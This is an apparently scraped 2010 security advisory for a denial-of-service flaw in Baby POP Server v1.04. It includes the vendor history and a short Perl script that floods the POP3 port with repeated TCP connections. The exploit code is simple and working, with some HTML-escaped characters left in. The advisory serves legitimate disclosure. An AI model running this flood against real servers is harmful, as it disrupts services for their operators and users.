[DCA-0005] Baby POP Server DoS

2010-08-1400:00:00

vulners.com

JSON

[DCA-0005]

[Software]

Baby POP Server

[Vendor Product Description]

In the past I have done several projects related to e-mail
(POP3/SMTP/IMAP4). One of the problems (at least in my company) is
that there are never good test servers available. So that's why I
decided to create this simple POP3 server, which doesn’t take many
resources and supports most of the standard POP3 commands.

[Bug Description]

The POP Server can't handle multiple/simultaneous connections
leading to Denial-of-Service

[History]

Advisory sent to vendor on 06/14/2010.
No response from vendor
Public advisory & exploit 08/02/2010.

[Impact]

[Affected Version]

Baby POP Server v1.04
Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

    if &#40;@ARGV &lt; 1&#41; {
            usage&#40;&#41;;
    }

    $ip     = $ARGV[0];
    $port   = $ARGV[1];
    $conn   = $ARGV[2];

    $num    = 0;

    print &quot;[+] Sending request...&#92;n&quot;;

    while &#40; $num &lt;= $conn &#41; {
            system&#40;&quot;echo -n .&quot;&#41;;
            $s = IO::Socket::INET-&gt;new&#40;Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt;

"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

    close&#40;$s&#41;;
    $num++;
    }

    print &quot;&#92;n[+] Done!&#92;n&quot;;

sub usage() {
print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n";
print "[-] Example: ". $0 ." 127.0.0.1 110 1200\n";
exit;
}

[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

[Greetz]
Crash and all Dclabs members.

–
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

JSON